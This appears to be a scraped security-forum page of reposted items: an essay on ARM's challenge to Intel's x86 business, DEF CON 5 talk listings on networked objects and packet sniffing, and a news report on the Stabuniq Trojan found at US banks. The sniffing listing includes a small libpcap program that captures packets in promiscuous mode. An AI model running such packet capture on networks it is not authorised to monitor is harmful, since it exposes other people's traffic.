While Intel has closed the ARM energy efficiency gap with its latest x86 Atom processors, the latest generation ARM-based chips are outperforming their Atom counterparts, and that performance advantage is expected to hold through 2013. The ARM architecture also continues to maintain a significant advantage in the areas of customization, form factor, and price due to ARM Holdings' unique licensing-based business model. Because of these additional benefits of ARM technology, it's unlikely that Intel's energy efficiency gains will significantly affect its short-term market penetration.

3. Because this new technology excels on a different dimension of performance, it initially attracts a new market segment.

    While x86 is the mainstay technology in PCs, the ARM processor has gained significant market share in the embedded systems and mobile devices markets. ARM-based processors are used in more than 95% of mobile phones (InformationWeek, 2010). And the ARM architecture is now the main choice for deployments of Google's Android and is the basis of Apple's A4 system on a chip, which is used in the latest generation iPod Touch and Apple TV, as well as the iPhone 4 and iPad.

ARM-based processors continue to dominate smartphones and tablets, with the ARM architecture maintaining market shares of 95% and 98%, respectively. [2] In the first half of 2012, there were just six phones with x86 chips inside (i.e., 0.2% of the worldwide market).
And, as of December 2012, there was scarce availability of tablets with x86 processors. [3] A major concern going forward is that Intel is limiting tablet support to Windows 8.

4. Once the new technology gains a foothold in a new market segment, further technology improvements enable it to move up-market, displacing the incumbent technology.

    With its foothold in the embedded systems and mobile markets, ARM technology continues to improve. The latest generation ARM chip (the Cortex-A15) retains the energy efficiency of its predecessors, but has a clock speed of up to 2.5 GHz, making it competitive with Intel's chips from the standpoint of processing power. As evidence of ARM's move up-market, the startup Smooth-Stone recently raised $48m in venture funding to produce energy efficient, high performance ARM-based chips for servers and data centers. I suspect we will begin seeing the ARM architecture in next generation laptops, netbooks, and smartphones (e.g., A4 in a MacBook Air).

ARM's latest Cortex-A15 processor is highly competitive with Intel's Atom line of processors. In a benchmarking analysis, "the [ARM-based] Samsung Exynos 5 Dual…easily beat out all of the tested Intel Atom processors." And while Intel's Core i3 processors outperformed the ARM-based processors, the Core i3's performance-per-watt makes it unsuitable for smartphones and tablets. Since energy conservation and cost are growing concerns among manufacturers, IT departments, and consumers, ARM-based chips are also moving upmarket into more demanding devices. While ARM technology hasn't made much headway in traditional desktop PCs and laptops, it has been deployed in the latest generation Google Chromebook, produced by Samsung. It's also the processor of choice in Microsoft's Surface RT, which is arguably a hybrid device (PC and tablet) given that it runs Windows and Office and has a keyboard. Furthermore, ARM's penetration of the server market is ushering in a new "microserver" era, with support from AMD, Calxeda, Dell, HP, Marvell, Samsung, Texas Instruments, and others (e.g., Applied Micro). [4]

5. The new, disruptive technology looks financially unattractive to established companies, in part because they have a higher cost structure.

    In 2009, Intel's costs of sales and operating expenses were a combined $29.6 billion. In contrast, ARM Holdings, the company that develops and supports the ARM architecture, had total expenses (cost of sales and operating) of $259 million. Unlike Intel, ARM does not produce and manufacture chips; instead it licenses its technology to OEMs and other parties, and the chips are often manufactured by a contract foundry (e.g., TSMC). Given ARM's low cost structure, and the competition in the foundry market, "ARM offers a considerably cheaper total solution than the x86 architecture can at present…" (datarespons.com, 2010). Intel is loath to follow ARM's licensing model because it would reduce Intel's revenues and profitability substantially.

In the first three quarters of 2012, Intel had revenue of $38.864 billion, operating expenses of $28.509b, and operating income of $11.355b. In contrast, ARM Holdings, with its licensing-based business model, had revenue of $886.88 million, operating expenses of $576.5m, and operating income of $307.12m. ARM Holdings has revenues and profits that are just a fraction (2-3%) of Intel's. This is the case even though ARM-based processors have a much greater share of the overall processor market. [5]
The smartphone and tablet markets, despite their sheer size and growth rates, are financially unattractive in comparison to the PC market. The price points and margins on processors in the mobile markets are significantly lower than those of higher-end PC and server processors. For instance, as of November 2012, the "Atom processor division contribute[d] only around 2% to Intel's valuation."

    In short, the ARM architecture appears to be in the early stages of disrupting x86, not just in the mobile and embedded systems markets, but also in the personal computer and server markets, the strongholds of Intel and AMD. This is evidenced in part by investors' expectations for ARM's, Intel's and AMD's future performance in microprocessor markets: today ARM Holdings has a price to earnings ratio of 77.93, while Intel and AMD have price to earnings ratios of 10.63 and 4.26, respectively.

It doesn't appear that Intel (or AMD) has solved the disruptive threat posed by ARM. The ARM architecture is maintaining its market share in smartphones and tablets, and gaining ground in upmarket devices, from hybrids (Chromebook and Surface RT) to servers. Investors concur with this assessment, as ARM Holdings has a price to earnings ratio of 70.74, while Intel has a price to earnings ratio of 9.22. [6]

    For Intel and AMD to avoid being disrupted, they must offer customers a microprocessor with comparable (or better) processing power and energy efficiency relative to the latest generation ARM chips, and offer this product at the same (or lower) price point relative to the ARM license plus the costs of manufacturing at a contract foundry. The Intel Atom is a strong move in this direction, but the Atom is facing resistance in the mobile market and emerging thin device markets (e.g., tablets) due to concerns about its energy efficiency, form factor, and price point.

While Intel has closed the energy efficiency gap with its latest Atom processors, it still lags in performance and hasn't dealt with the issues of customization and form factor. It's likely that its pricing also remains unattractive. Although I don't have precise data on Intel's or ARM's pricing for comparable processors, one can get an estimate by comparing Intel's listed processor prices with teardown data from iSuppli. According to this rough analysis, the latest Atom processors range in price from $42-$75, while ARM-based processors have prices (including manufacturing) in the $15-25 range. [7] Therefore, Intel would need to offer a 60%+ discount off list prices just to achieve parity.

    The x86 architecture is supported by a massive ecosystem of suppliers (e.g., Applied Materials), customers (e.g., Dell), and complements (e.g., Microsoft Windows). If Intel and AMD are not able to fend off ARM, and the ARM architecture does displace x86, it would cause turbulence for a large number of companies.

This turbulence is now real and visible. The major companies that make up the x86 ecosystem, including producers (Intel and AMD), suppliers (e.g., Applied Materials), customers (e.g., Dell and HP), and complements (e.g., Microsoft), are all struggling to gain the confidence of investors. Each has underperformed stock market averages over the last two years, and many are now implementing their own ARM-based strategies, remarkably even x86 stalwarts AMD and Microsoft. Meanwhile, Paul Otellini, Intel's CEO, retired suddenly and unexpectedly just last month.
Intel, in particular, faces a precarious situation. It can harvest its tremendous profits in the PC market for the next several years, or it can compete in the next generation of processors by aggressively developing low-margin processors and replicating ARM Holdings' licensing-based business model. [7] It's a choice between serving a known, highly profitable market (in the shorter term) and possibly winning in a comparatively unknown, unprofitable market (in the longer term). As a professional executive or manager, which option would you choose? Thus we have the innovator's dilemma.

[1] This contrasts significantly with the sales impact from the launch of Windows 7, when sales of Windows PCs rose 49% during the first week Windows 7 was on sale, compared to the previous year.

[2] While Apple has an instruction set license to execute ARM commands, it designed its own custom ARM compatible CPU core for the iPhone 5 and iPad 4.

[3] Intel reports having 20 tablets in its pipeline for launch by the end of this year.

[4] Intel's efforts to create a new market segment for its x86 microprocessors, such as Ultrabooks, have thus far underperformed expectations.

[5] I wasn't able to find data on Intel processor shipments in 2011, but as a rough comparison, it looks like ARM and its licensees shipped 7.9b processors in 2011, while worldwide PC shipments totalled 352.8m units. In 2011, Intel had a roughly 80% market share in the PC market.

[6] AMD had a net loss in its latest quarter, so a price to earnings ratio cannot be computed.

[7] Intel could obtain an ARM license and enter the contract foundry business, but analysts expect such a move would also put a significant drag on its margins and profitability.

Sursa: The End of x86? An Update
  23. [Audio] Issues with Security and Networked Object Systems

From the Hacker Jeopardy winning team. He will discuss issues with security and networked object systems, looking at some of the recent security issues found with ActiveX, and detail some of the potential and problems of network objects. Topics will include development of objects, distributed objects, standards, ActiveX, CORBA, and hacking objects.

Size: 23.3 MB

Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Clovis%20-%20Issues%20with%20Security%20and%20Networked%20Object%20Systems%20-%20Audio.m4b

Sursa: IT Security and Hacking knowledge base - SecDocs
  24. [Audio] Packet Sniffing

He will define the idea, explain everything from 802.2 frames down to the TCP datagram, and explain the mechanisms (NIT, BPF) that different platforms provide to allow the hack (a modern sketch of such a sniffer follows below).
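As a modern companion to the capture mechanisms named above (NIT, BPF), a minimal BPF-backed capture loop today would typically go through libpcap. This is an editor's sketch, not material from the talk; it assumes libpcap is installed, an interface named "eth0" exists, and the process has capture privileges (build with: cc sniff.c -lpcap):

#include <stdio.h>
#include <pcap.h>

/* print a one-line summary for each captured packet */
static void on_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *bytes)
{
        (void)user; (void)bytes;
        printf("captured %u bytes (wire length %u)\n", h->caplen, h->len);
}

int main(void)
{
        char errbuf[PCAP_ERRBUF_SIZE];
        /* open in promiscuous mode; the kernel-side machinery (BPF on BSD,
         * PF_PACKET on Linux) delivers the raw frames */
        pcap_t *p = pcap_open_live("eth0", 65535, 1, 1000, errbuf);

        if (p == NULL) {
                fprintf(stderr, "pcap_open_live: %s\n", errbuf);
                return 1;
        }
        pcap_loop(p, 10, on_packet, NULL); /* hand 10 packets to the callback */
        pcap_close(p);
        return 0;
}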
Size: 25.2 MB

Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Wrangler%20-%20Packet%20Sniffing%20-%20Audio.m4b

Sursa: IT Security and Hacking knowledge base - SecDocs

  25. [h=1]Security researchers identify malware infecting U.S. banks[/h]

By Lucian Constantin, IDG News Service
Dec 22, 2012 12:36 PM

Security researchers from Symantec have identified an information-stealing Trojan program that was used to infect computer servers belonging to various U.S. financial institutions.

Dubbed Stabuniq, the Trojan program was found on mail servers, firewalls, proxy servers, and gateways belonging to U.S. financial institutions, including banking firms and credit unions, Symantec software engineer Fred Gutierrez said Friday in a blog post.

"Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users," Gutierrez said. "Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions."

Based on a map showing the threat's distribution in the U.S. that was published by Symantec, the vast majority of systems infected with Stabuniq are located in the eastern half of the country, with strong concentrations in the New York and Chicago areas.

Compared to other Trojan programs, Stabuniq infected a relatively small number of computers, which suggests that its authors might have targeted specific individuals and organizations, Gutierrez said.

The malware was distributed using a combination of spam emails and malicious websites that hosted Web exploit toolkits. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java.

Once installed, the Stabuniq Trojan program collects information about the compromised computer, such as its name, running processes, OS and service pack version, and assigned IP (Internet Protocol) address, and sends this information to command-and-control (C&C) servers operated by the attackers. "At this stage we believe the malware authors may simply be gathering information," Gutierrez said.

Sursa: Security researchers identify malware infecting U.S. banks | PCWorld